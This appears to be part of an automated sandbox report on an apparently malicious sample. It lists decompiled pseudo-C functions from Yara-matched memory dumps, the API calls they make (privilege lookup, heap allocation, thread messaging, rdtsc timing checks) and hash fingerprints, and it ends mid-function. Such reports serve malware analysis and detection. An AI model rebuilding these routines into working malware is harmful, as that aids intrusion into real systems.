                                                                        • Instruction ID: 56edd341266eb60943566afae013ad589115b806c830ca89e2ff7e7fbee49b49
                                                                        • Opcode Fuzzy Hash: 28c77184fe95edaf1826af25dc0f66afdfade83a195358f500431b5d572c955f
                                                                        • Instruction Fuzzy Hash: 98E0C236240314ABDB10EFD4CC85EDB3768EF48310F144059BE585B342CA30E90087D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004182E0(intOrPtr _a4, void* _a8) {
                                                                        				long _t8;
                                                                        				void* _t11;
                                                                        
                                                                        				_t5 = _a4;
                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                        				_t3 = _t5 + 0xc50; // 0x409733
                                                                        				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                        				_t8 = NtClose(_a8); // executed
                                                                        				return _t8;
                                                                        			}





                                                                        0x004182e3
                                                                        0x004182e6
                                                                        0x004182ef
                                                                        0x004182f7
                                                                        0x00418305
                                                                        0x00418309

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                        • Instruction ID: f09df2499df8cd06342f466bad1ea290f80e2b0de04fcdece786d66633cd5a27
                                                                        • Opcode Fuzzy Hash: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                        • Instruction Fuzzy Hash: FC90026160101502D20171694404656040A97D0381F91C432A1014555ECA6589D2F1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                        • Instruction ID: 8cda8a290229feab99281d60757bf8eee6e2f6044de430cbcb682a4c55ad418c
                                                                        • Opcode Fuzzy Hash: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                        • Instruction Fuzzy Hash: 5E90027120101413D21161694504747040997D0381F91C822A0414558D96968992F1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                        • Instruction ID: 7f377594fd477e745db0d2365666abab7a85ba38085e1d36b8c60e47a0b3168f
                                                                        • Opcode Fuzzy Hash: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                        • Instruction Fuzzy Hash: A3900261242051525645B16944045474406A7E0381791C422A1404950C85669896E6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                        • Instruction ID: 642dd0def788fb938de69273999da7cd801649df2f03b5e1a960fec64ae0fb7f
                                                                        • Opcode Fuzzy Hash: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                        • Instruction Fuzzy Hash: D49002A134101442D20061694414B460405D7E1341F51C425E1054554D8659CC92B1A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                        • Instruction ID: c7954daf700f4338adbdfeed6f0069a43556669194b8081608872ad512236bd5
                                                                        • Opcode Fuzzy Hash: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                        • Instruction Fuzzy Hash: 099002B120101402D24071694404786040597D0341F51C421A5054554E86998DD5B6E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                        • Instruction ID: 3b687e96f199dd21cb378e9f49fe73b3375dc4ba105fcb134f0ba31fb03a36e3
                                                                        • Opcode Fuzzy Hash: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                        • Instruction Fuzzy Hash: 01900261601010424240717988449464405BBE1351751C531A0988550D859988A5A6E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                        • Instruction ID: 8df89223d9018c177ff8f1eb54fca35c11d7028d3a219ead17575dfc413adddf
                                                                        • Opcode Fuzzy Hash: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                        • Instruction Fuzzy Hash: D690027120141402D2006169481474B040597D0342F51C421A1154555D86658891B5F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                        • Instruction ID: 1bf617c2e1ee59fc22ddbed6eb5cdbdb23f82eb87c14a0d42622089325ef8903
                                                                        • Opcode Fuzzy Hash: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                        • Instruction Fuzzy Hash: 2490026121181042D30065794C14B47040597D0343F51C525A0144554CC95588A1A5A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                        • Instruction ID: c89522a2b032d0d00dff26a7a0b15994b5a58150f72595e5f04cdba066ffebc9
                                                                        • Opcode Fuzzy Hash: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                        • Instruction Fuzzy Hash: C79002A120201003420571694414656440A97E0341B51C431E1004590DC56588D1B1A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                        • Instruction ID: 6f023eacc869ff7f25b3af23d12435b2af70af3398e7feea62e8707887d18864
                                                                        • Opcode Fuzzy Hash: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                        • Instruction Fuzzy Hash: 6E900265211010030205A5690704547044697D5391351C431F1005550CD66188A1A1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                        • Instruction ID: 8205e1a92dd3e72244153608506a96a365a32d10630a253063b883e78df6617f
                                                                        • Opcode Fuzzy Hash: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                        • Instruction Fuzzy Hash: 7690027120109802D2106169840478A040597D0341F55C821A4414658D86D588D1B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                        • Instruction ID: 58efcbd6f734c61d2ad59f03bbfe76f3c83c9e217c82a060905bc2ba634e7742
                                                                        • Opcode Fuzzy Hash: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                        • Instruction Fuzzy Hash: 6D90027120101802D2807169440468A040597D1341F91C425A0015654DCA558A99B7E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                        • Instruction ID: bc39d063fef2f08a8de5a0600114798c88d7b666a9122f203a008fdcbf199305
                                                                        • Opcode Fuzzy Hash: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                        • Instruction Fuzzy Hash: 8890026130101003D240716954186464405E7E1341F51D421E0404554CD9558896A2A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                        • Instruction ID: 7a9f111b437a2ce17f5b8e5668e2a5b3ba7da211e4f3bfefa99e87cadca76612
                                                                        • Opcode Fuzzy Hash: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                        • Instruction Fuzzy Hash: 1A90026921301002D2807169540864A040597D1342F91D825A0005558CC95588A9A3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                        • Instruction ID: 081c01b96c3e170aec37ee04d371d35005f4d4e547f399acb0f3bdc49266b50b
                                                                        • Opcode Fuzzy Hash: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                        • Instruction Fuzzy Hash: D890027131115402D21061698404746040597D1341F51C821A0814558D86D588D1B1A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                        • Instruction ID: 64f1f5af06b8ba630cc63a7c6f296be1647b0df368996297f46b3b2ce2f2b3b1
                                                                        • Opcode Fuzzy Hash: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                        • Instruction Fuzzy Hash: 1A90027120101402D20065A95408686040597E0341F51D421A5014555EC6A588D1B1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004088A0(intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				char _v284;
                                                                        				char _v804;
                                                                        				char _v840;
                                                                        				void* _t24;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t39;
                                                                        				void* _t50;
                                                                        				intOrPtr _t52;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        
                                                                        				_t52 = _a4;
                                                                        				_t39 = 0; // executed
                                                                        				_t24 = E00406E00(_t52,  &_v24); // executed
                                                                        				_t54 = _t53 + 8;
                                                                        				if(_t24 != 0) {
                                                                        					E00407010( &_v24,  &_v840);
                                                                        					_t55 = _t54 + 8;
                                                                        					do {
                                                                        						E00419CC0( &_v284, 0x104);
                                                                        						E0041A330( &_v284,  &_v804);
                                                                        						_t56 = _t55 + 0x10;
                                                                        						_t50 = 0x4f;
                                                                        						while(1) {
                                                                        							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
                                                                        							_t56 = _t56 + 0x10;
                                                                        							if(_t31 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t50 = _t50 + 1;
                                                                        							if(_t50 <= 0x62) {
                                                                        								continue;
                                                                        							} else {
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        						_t9 = _t52 + 0x14; // 0xffffe1b5
                                                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                        						_t39 = 1;
                                                                        						L8:
                                                                        						_t33 = E00407040( &_v24,  &_v840);
                                                                        						_t55 = _t56 + 8;
                                                                        					} while (_t33 != 0 && _t39 == 0);
                                                                        					_t34 = E004070C0(_t52,  &_v24); // executed
                                                                        					if(_t39 == 0) {
                                                                        						asm("rdtsc");
                                                                        						asm("rdtsc");
                                                                        						_v8 = _t34 - 0 + _t34;
                                                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t24;
                                                                        				}
                                                                        			}



















                                                                        0x004088ab
                                                                        0x004088b3
                                                                        0x004088b5
                                                                        0x004088ba
                                                                        0x004088bf
                                                                        0x004088d2
                                                                        0x004088d7
                                                                        0x004088e0
                                                                        0x004088ec
                                                                        0x004088ff
                                                                        0x00408904
                                                                        0x00408907
                                                                        0x00408910
                                                                        0x00408922
                                                                        0x00408927
                                                                        0x0040892c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040892e
                                                                        0x00408932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00408934
                                                                        0x00000000
                                                                        0x00408932
                                                                        0x00408936
                                                                        0x00408939
                                                                        0x0040893f
                                                                        0x00408941
                                                                        0x0040894c
                                                                        0x00408951
                                                                        0x00408954
                                                                        0x00408961
                                                                        0x0040896c
                                                                        0x0040896e
                                                                        0x00408974
                                                                        0x00408978
                                                                        0x0040897b
                                                                        0x0040897b
                                                                        0x00408982
                                                                        0x00408985
                                                                        0x0040898a
                                                                        0x00408997
                                                                        0x004088c6
                                                                        0x004088c6
                                                                        0x004088c6

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                        • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E004184B2(void* __eax, void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                        				void* _t34;
                                                                        
                                                                        				asm("int3");
                                                                        				asm("loope 0x38");
                                                                        				_t3 = __esi - 0x62;
                                                                        				 *_t3 =  *((intOrPtr*)(__esi - 0x62)) - _t34;
                                                                        				if ( *_t3 != 0) goto L3;
                                                                        			}




                                                                        0x004184b8
                                                                        0x004184b9
                                                                        0x004184bb
                                                                        0x004184bb
                                                                        0x004184bf

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitFreeHeapProcess
                                                                        • String ID:
                                                                        • API String ID: 1180424539-0
                                                                        • Opcode ID: bedcce826d9413d64ce37c51eb5aefb854cd43b9e841e933c38bde8686d6bb52
                                                                        • Instruction ID: c5812b134601cec6ed4ce3c89a67d10858ddf80978952279d4a92857d737ad01
                                                                        • Opcode Fuzzy Hash: bedcce826d9413d64ce37c51eb5aefb854cd43b9e841e933c38bde8686d6bb52
                                                                        • Instruction Fuzzy Hash: 69F06D70200204ABDB24EF69DC45EE77768EF85314F01854EF9499B342DA34EA55CAF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                        				char _v67;
                                                                        				char _v68;
                                                                        				void* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				int _t14;
                                                                        				long _t21;
                                                                        				intOrPtr* _t25;
                                                                        				void* _t26;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_v68 = 0;
                                                                        				E00419D10( &_v67, 0, 0x3f);
                                                                        				E0041A8F0( &_v68, 3);
                                                                        				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                        				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                        				_t25 = _t13;
                                                                        				if(_t25 != 0) {
                                                                        					_t21 = _a8;
                                                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                        					_t32 = _t14;
                                                                        					if(_t14 == 0) {
                                                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                        					}
                                                                        					return _t14;
                                                                        				}
                                                                        				return _t13;
                                                                        			}












                                                                        0x00407260
                                                                        0x0040726f
                                                                        0x00407273
                                                                        0x0040727e
                                                                        0x0040728e
                                                                        0x0040729e
                                                                        0x004072a3
                                                                        0x004072aa
                                                                        0x004072ad
                                                                        0x004072ba
                                                                        0x004072bc
                                                                        0x004072be
                                                                        0x004072db
                                                                        0x004072db
                                                                        0x00000000
                                                                        0x004072dd
                                                                        0x004072e2

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                        • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction ID: e786dc0bd8427be7affffb0d36256a0335f692e93034ad8e648979a5604a716e
                                                                        • Opcode Fuzzy Hash: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction Fuzzy Hash: 52F0C2B26042106FCB10DF98D885DEB77A9EF85320B04849AF90C9B212D531EA10CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E00418611(void* __eax, void* __ebx, intOrPtr _a4, WCHAR* _a12, void* _a16) {
                                                                        				signed int _v11;
                                                                        				WCHAR* _t10;
                                                                        				int _t11;
                                                                        				WCHAR* _t14;
                                                                        				void* _t19;
                                                                        				signed int _t27;
                                                                        
                                                                        				asm("xlatb");
                                                                        				_t27 = _v11 * 0x55;
                                                                        				_t9 = _a4;
                                                                        				_t14 =  *(_a4 + 0xa18);
                                                                        				_t10 = E00418DB0(_t19, _a4, _t9 + 0xc8c, _t14, 0, 0x46);
                                                                        				if(_t27 < 0) {
                                                                        					 *_t10 = _t10 +  *_t10;
                                                                        					_t10 = _a12;
                                                                        				}
                                                                        				asm("adc [ebx-0x3b7cf3b3], cl");
                                                                        				asm("adc al, 0x52");
                                                                        				_t11 = LookupPrivilegeValueW(_t14, _t10, ??); // executed
                                                                        				return _t11;
                                                                        			}









                                                                        0x00418618
                                                                        0x0041861d
                                                                        0x00418623
                                                                        0x00418626
                                                                        0x0041863a
                                                                        0x0041863b
                                                                        0x0041863d
                                                                        0x00418642
                                                                        0x00418642
                                                                        0x00418644
                                                                        0x0041864a
                                                                        0x00418650
                                                                        0x00418654

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: daea61a1fc8f0185a56a6f1fd9c3db7f782f31fe3f6a131274be864722587fd1
                                                                        • Instruction ID: 6ab814c6eccd1fa940f1adbdb9261c27b9ba15d32305f8d74d47cb96cdcb8471
                                                                        • Opcode Fuzzy Hash: daea61a1fc8f0185a56a6f1fd9c3db7f782f31fe3f6a131274be864722587fd1
                                                                        • Instruction Fuzzy Hash: 7AE06DB16002086FDB10DF59CC81EDB77AAEF89750F018159FE1DAB281C930E9418BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                        				void* _t10;
                                                                        				void* _t15;
                                                                        
                                                                        				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        0x00418497
                                                                        0x004184ad
                                                                        0x004184b1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E00418620(void* __eflags, intOrPtr _a4, WCHAR* _a12, void* _a16) {
                                                                        				WCHAR* _t7;
                                                                        				int _t8;
                                                                        				WCHAR* _t9;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        
                                                                        				_t14 = __eflags;
                                                                        				_t6 = _a4;
                                                                        				_t9 =  *(_a4 + 0xa18);
                                                                        				_t7 = E00418DB0(_t12, _a4, _t6 + 0xc8c, _t9, 0, 0x46);
                                                                        				if(_t14 < 0) {
                                                                        					 *_t7 = _t7 +  *_t7;
                                                                        					_t7 = _a12;
                                                                        				}
                                                                        				asm("adc [ebx-0x3b7cf3b3], cl");
                                                                        				asm("adc al, 0x52");
